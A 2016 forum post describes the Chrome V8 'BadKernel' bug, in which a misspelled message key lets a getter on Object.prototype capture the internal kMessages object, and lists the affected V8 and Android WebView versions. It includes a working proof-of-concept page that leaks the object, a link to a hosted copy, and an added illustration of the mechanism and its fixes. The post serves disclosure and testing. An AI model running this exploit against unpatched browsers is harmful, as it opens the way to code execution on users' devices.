HackerTop - View topic - Google Chrome V8 BadKernel Vulnerability



 Google Chrome V8 BadKernel Vulnerability 
Google V8 is an open source JavaScript engine developed for the Chrome browser.

The vulnerability is due to the exception type "observe_accept_invalid" being mistakenly written as "observe_invalid_accept" in the source code.

An attacker can use the vulnerability to leak the kMessages key object and execute arbitrary code.

Mobile phone apps developed on the system WebView control of Android 4.4.4 to 5.1 are likely to be affected by the vulnerability.
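The mechanism behind the bug, as an added illustration that is not V8's code or part of the original post: a message table looked up with a key that does not exist falls through to Object.prototype, where a getter sees the table itself as `this`. The table, the `makeTypeError` lookups and the `probe` helper are all constructed for this example; the hardened variants show the two checks that stop the leak.

```javascript
// Stand-in for V8's internal kMessages table (constructed sample, not V8's).
const kMessagesTable = {
  observe_accept_invalid: "Third argument to Object.observe must be an array of strings.",
};

// Weak lookup: a plain property read walks the prototype chain, so a
// misspelled key reaches any getter installed on Object.prototype.
function makeTypeError(table, type) {
  const template = table[type];
  return new TypeError(template === undefined ? "unknown message " + type : template);
}

// Hardened lookup: only own properties are consulted, so prototype getters never run.
function makeTypeErrorHardened(table, type) {
  const template = Object.prototype.hasOwnProperty.call(table, type) ? table[type] : undefined;
  return new TypeError(template === undefined ? "unknown message " + type : template);
}

// Second mitigation: a table with no prototype has no chain to walk at all.
const kMessagesTableNullProto = Object.assign(Object.create(null), kMessagesTable);

// Installs a getter on Object.prototype for `key`, runs the lookup, removes
// the getter again and reports whether the lookup handed the table to the getter.
function probe(lookupFn, table, key) {
  let captured;
  Object.defineProperty(Object.prototype, key, {
    get() { captured = this; },
    configurable: true,
  });
  try {
    lookupFn(table, key);
  } finally {
    delete Object.prototype[key];  // always clean up the prototype
  }
  return captured === table;
}

// Expected: the misspelled key leaks the table through the weak lookup only.
console.log("weak, misspelled key:", probe(makeTypeError, kMessagesTable, "observe_invalid_accept"));
console.log("weak, correct key:", probe(makeTypeError, kMessagesTable, "observe_accept_invalid"));
console.log("own-property check:", probe(makeTypeErrorHardened, kMessagesTable, "observe_invalid_accept"));
console.log("null prototype:", probe(makeTypeError, kMessagesTableNullProto, "observe_invalid_accept"));
```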


Google Chrome V8 : 3.20 ~ 4.2 Version

Android: 4.4.4 ~ 5.1 Version

Code:
Proof of Concept
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>badkernel</title>
</head>
<body>
<script type="text/javascript">
    var kMessages;
    // Getter on Object.prototype for the misspelled message key: the lookup
    // of the missing key on the internal kMessages table falls through to it,
    // and "this" is then the kMessages object itself.
    Object.prototype.__defineGetter__("observe_invalid_accept", function(){kMessages=this});
    try{
        // A non-array third argument makes Object.observe raise the affected TypeError.
        Object.observe({},function(){}, 1);
    } catch(e) {
    }
    delete Object.prototype["observe_invalid_accept"];
    // An object is shown on a vulnerable V8; undefined otherwise.
    alert(kMessages);
</script>
</body>
</html>


Or

http://poc.hackertop.org/Android/v8rce_poc.html



If the browser opens the page and the kMessages object can be obtained, the output is an object name and the browser is vulnerable.

If the output is undefined, it is not vulnerable.


chrome://version


Reference:

http://www.cnnvd.org.cn/vulnerability/s ... 2016080414


Tue Aug 23, 2016 11:14 am